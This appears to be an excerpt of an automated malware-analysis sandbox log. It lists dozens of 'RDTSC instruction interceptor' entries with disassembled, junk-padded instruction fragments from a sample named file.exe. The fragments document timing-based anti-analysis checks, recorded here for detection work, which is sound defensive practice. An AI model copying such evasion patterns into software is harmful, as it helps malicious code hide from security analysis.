              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4673F3 second address: 4673F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 476F2A second address: 476F30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 476F30 second address: 476F34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 476F34 second address: 476F38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 476F38 second address: 476F40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 476F40 second address: 476F4A instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FBF3CD0A8B2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48CA9C second address: 48CAB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FBF3CE524BBh 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48CF1B second address: 48CF1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48CF1F second address: 48CF25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48CF25 second address: 48CF32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48D34B second address: 48D35F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBF3CE524C0h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48D35F second address: 48D36A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 490905 second address: 49092D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jns 00007FBF3CE524B6h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FBF3CE524C8h 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 490B4D second address: 490BA7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007FBF3CD0A8ADh 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push ecx 0x0000000d push esi 0x0000000e jmp 00007FBF3CD0A8AAh 0x00000013 pop esi 0x00000014 pop ecx 0x00000015 nop 0x00000016 pushad 0x00000017 mov cx, ax 0x0000001a popad 0x0000001b pushad 0x0000001c or dword ptr [ebp+122D275Eh], ecx 0x00000022 mov ebx, ecx 0x00000024 popad 0x00000025 push dword ptr [ebp+122D27C5h] 0x0000002b call 00007FBF3CD0A8ACh 0x00000030 cmc 0x00000031 pop edx 0x00000032 push C1487133h 0x00000037 push eax 0x00000038 push edx 0x00000039 jmp 00007FBF3CD0A8ADh 0x0000003e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 490BA7 second address: 490BAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 495436 second address: 495459 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 jmp 00007FBF3CD0A8B1h 0x0000000d popad 0x0000000e popad 0x0000000f push edx 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push esi 0x00000014 pop esi 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3AE6D0 second address: 3AE6D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3AE6D4 second address: 3AE6DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B1038E second address: 4B103E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF3CE524C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007FBF3CE524C3h 0x00000014 or esi, 28DB7B1Eh 0x0000001a jmp 00007FBF3CE524C9h 0x0000001f popfd 0x00000020 pushad 0x00000021 popad 0x00000022 popad 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B3060E second address: 4B30646 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx esi, bx 0x00000006 mov di, 2D0Ah 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007FBF3CD0A8ADh 0x00000017 xor eax, 44051A86h 0x0000001d jmp 00007FBF3CD0A8B1h 0x00000022 popfd 0x00000023 popad 0x00000024 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B30646 second address: 4B30731 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF3CE524BDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FBF3CE524BEh 0x0000000f mov ebp, esp 0x00000011 pushad 0x00000012 push esi 0x00000013 pushfd 0x00000014 jmp 00007FBF3CE524BDh 0x00000019 or ecx, 391BBD46h 0x0000001f jmp 00007FBF3CE524C1h 0x00000024 popfd 0x00000025 pop esi 0x00000026 push ebx 0x00000027 push esi 0x00000028 pop edi 0x00000029 pop esi 0x0000002a popad 0x0000002b push esp 0x0000002c pushad 0x0000002d movzx ecx, bx 0x00000030 pushfd 0x00000031 jmp 00007FBF3CE524C7h 0x00000036 jmp 00007FBF3CE524C3h 0x0000003b popfd 0x0000003c popad 0x0000003d mov dword ptr [esp], ecx 0x00000040 pushad 0x00000041 pushfd 0x00000042 jmp 00007FBF3CE524C4h 0x00000047 sub ch, FFFFFFA8h 0x0000004a jmp 00007FBF3CE524BBh 0x0000004f popfd 0x00000050 pushfd 0x00000051 jmp 00007FBF3CE524C8h 0x00000056 and cl, 00000008h 0x00000059 jmp 00007FBF3CE524BBh 0x0000005e popfd 0x0000005f popad 0x00000060 xchg eax, esi 0x00000061 push eax 0x00000062 push edx 0x00000063 jmp 00007FBF3CE524C5h 0x00000068 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B30731 second address: 4B30783 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 movsx ebx, si 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FBF3CD0A8B5h 0x00000013 sub cx, 2586h 0x00000018 jmp 00007FBF3CD0A8B1h 0x0000001d popfd 0x0000001e mov edx, ecx 0x00000020 popad 0x00000021 xchg eax, esi 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 mov edx, 18CF2B1Ah 0x0000002a jmp 00007FBF3CD0A8ABh 0x0000002f popad 0x00000030 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B30783 second address: 4B30789 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B30789 second address: 4B3078D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B3078D second address: 4B307C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF3CE524BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b lea eax, dword ptr [ebp-04h] 0x0000000e pushad 0x0000000f mov ebx, eax 0x00000011 popad 0x00000012 push ebp 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FBF3CE524C9h 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B307C1 second address: 4B307D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, ax 0x00000006 push eax 0x00000007 pop ebx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B307D5 second address: 4B307D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B307D9 second address: 4B307DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B307DF second address: 4B307F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBF3CE524C5h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B30825 second address: 4B3082B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B3082B second address: 4B3082F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B3091C second address: 4B30922 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B30922 second address: 4B30926 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B30926 second address: 4B3094C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007FBF3CD0A8B5h 0x00000011 mov cx, ADB7h 0x00000015 popad 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B3094C second address: 4B30008 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FBF3CE524C3h 0x00000009 add si, C53Eh 0x0000000e jmp 00007FBF3CE524C9h 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007FBF3CE524C0h 0x0000001a jmp 00007FBF3CE524C5h 0x0000001f popfd 0x00000020 popad 0x00000021 pop edx 0x00000022 pop eax 0x00000023 leave 0x00000024 jmp 00007FBF3CE524BEh 0x00000029 retn 0004h 0x0000002c nop 0x0000002d sub esp, 04h 0x00000030 xor ebx, ebx 0x00000032 cmp eax, 00000000h 0x00000035 je 00007FBF3CE52605h 0x0000003b xor eax, eax 0x0000003d mov dword ptr [esp], 00000000h 0x00000044 mov dword ptr [esp+04h], 00000000h 0x0000004c call 00007FBF417AE00Bh 0x00000051 mov edi, edi 0x00000053 push eax 0x00000054 push edx 0x00000055 push eax 0x00000056 push edx 0x00000057 pushad 0x00000058 popad 0x00000059 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B30008 second address: 4B3001B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF3CD0A8AFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B3001B second address: 4B3005C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF3CE524C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FBF3CE524BEh 0x0000000f push eax 0x00000010 jmp 00007FBF3CE524BBh 0x00000015 xchg eax, ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 movsx edi, si 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B3005C second address: 4B30061 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B30061 second address: 4B30067 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B30067 second address: 4B300BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF3CD0A8B5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007FBF3CD0A8B3h 0x00000016 and eax, 2809F76Eh 0x0000001c jmp 00007FBF3CD0A8B9h 0x00000021 popfd 0x00000022 push ecx 0x00000023 pop edi 0x00000024 popad 0x00000025 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B300BE second address: 4B300D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, edx 0x00000005 mov ebx, 1CC15FDAh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push FFFFFFFEh 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 movzx ecx, di 0x00000015 movsx edx, ax 0x00000018 popad 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B300D7 second address: 4B300DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B300DD second address: 4B300E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B300E1 second address: 4B30118 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 call 00007FBF3CD0A8A9h 0x0000000d jmp 00007FBF3CD0A8AFh 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FBF3CD0A8B4h 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B30118 second address: 4B3012A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBF3CE524BEh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B3012A second address: 4B30168 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF3CD0A8ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f jmp 00007FBF3CD0A8B9h 0x00000014 mov eax, dword ptr [eax] 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 jmp 00007FBF3CD0A8AAh 0x0000001e popad 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B30168 second address: 4B3016E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B3016E second address: 4B30172 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B30172 second address: 4B301AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c pushad 0x0000000d mov ch, dl 0x0000000f movzx ecx, bx 0x00000012 popad 0x00000013 pop eax 0x00000014 jmp 00007FBF3CE524C9h 0x00000019 push 7EB96DA1h 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 popad 0x00000024 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B301AA second address: 4B301C2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF3CD0A8B4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B301C2 second address: 4B30234 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, di 0x00000006 pushfd 0x00000007 jmp 00007FBF3CE524BDh 0x0000000c add eax, 540B9146h 0x00000012 jmp 00007FBF3CE524C1h 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b xor dword ptr [esp], 0B1046D1h 0x00000022 pushad 0x00000023 push ecx 0x00000024 mov edi, 7C36EFCEh 0x00000029 pop edi 0x0000002a jmp 00007FBF3CE524C4h 0x0000002f popad 0x00000030 mov eax, dword ptr fs:[00000000h] 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007FBF3CE524C7h 0x0000003d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B30234 second address: 4B3023A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B3023A second address: 4B30263 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c call 00007FBF3CE524C9h 0x00000011 pop esi 0x00000012 mov bh, 37h 0x00000014 popad 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B30263 second address: 4B30280 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, di 0x00000006 mov ebx, 38B92508h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FBF3CD0A8AAh 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B30280 second address: 4B302DD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, edx 0x00000005 mov si, di 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b sub esp, 18h 0x0000000e pushad 0x0000000f mov cx, bx 0x00000012 pushad 0x00000013 jmp 00007FBF3CE524C7h 0x00000018 mov ch, 98h 0x0000001a popad 0x0000001b popad 0x0000001c push esi 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007FBF3CE524BEh 0x00000024 sbb esi, 10B084F8h 0x0000002a jmp 00007FBF3CE524BBh 0x0000002f popfd 0x00000030 mov ebx, esi 0x00000032 popad 0x00000033 mov dword ptr [esp], ebx 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a pushad 0x0000003b popad 0x0000003c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B302DD second address: 4B302F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF3CD0A8B3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B3042C second address: 4B30490 instructions: 0x00000000 rdtsc 0x00000002 mov edi, esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 lea eax, dword ptr [ebp-10h] 0x0000000a jmp 00007FBF3CE524BCh 0x0000000f mov dword ptr fs:[00000000h], eax 0x00000015 jmp 00007FBF3CE524C0h 0x0000001a mov dword ptr [ebp-18h], esp 0x0000001d jmp 00007FBF3CE524C0h 0x00000022 mov eax, dword ptr fs:[00000018h] 0x00000028 jmp 00007FBF3CE524C0h 0x0000002d mov ecx, dword ptr [eax+00000FDCh] 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 push edx 0x00000037 pop eax 0x00000038 mov si, bx 0x0000003b popad 0x0000003c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B30490 second address: 4B304A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBF3CD0A8B1h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B304A5 second address: 4B304EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test ecx, ecx 0x0000000a pushad 0x0000000b call 00007FBF3CE524C3h 0x00000010 mov ebx, esi 0x00000012 pop esi 0x00000013 push edx 0x00000014 mov bx, cx 0x00000017 pop esi 0x00000018 popad 0x00000019 jns 00007FBF3CE524F1h 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007FBF3CE524C6h 0x00000026 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B304EA second address: 4B30501 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF3CD0A8ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add eax, ecx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e movzx esi, di 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B2012C second address: 4B20179 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF3CE524C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push edi 0x0000000c pushfd 0x0000000d jmp 00007FBF3CE524BAh 0x00000012 jmp 00007FBF3CE524C5h 0x00000017 popfd 0x00000018 pop eax 0x00000019 mov bx, EF04h 0x0000001d popad 0x0000001e xchg eax, ebp 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B20179 second address: 4B2017D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B2017D second address: 4B201D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007FBF3CE524C0h 0x00000009 call 00007FBF3CE524C2h 0x0000000e pop eax 0x0000000f pop ebx 0x00000010 popad 0x00000011 mov ebp, esp 0x00000013 jmp 00007FBF3CE524BEh 0x00000018 sub esp, 2Ch 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007FBF3CE524C7h 0x00000022 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B201D2 second address: 4B201F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF3CD0A8B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B201F6 second address: 4B201FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B201FA second address: 4B20200 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B20200 second address: 4B20206 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B20206 second address: 4B2020A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B2020A second address: 4B2020E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B2020E second address: 4B2021D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B2021D second address: 4B20221 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B20221 second address: 4B20225 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B20225 second address: 4B2022B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B2022B second address: 4B20277 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF3CD0A8B7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007FBF3CD0A8B6h 0x0000000f xchg eax, edi 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FBF3CD0A8B7h 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B20277 second address: 4B202A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FBF3CE524BFh 0x00000008 mov ax, 672Fh 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FBF3CE524C0h 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B202A3 second address: 4B202A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
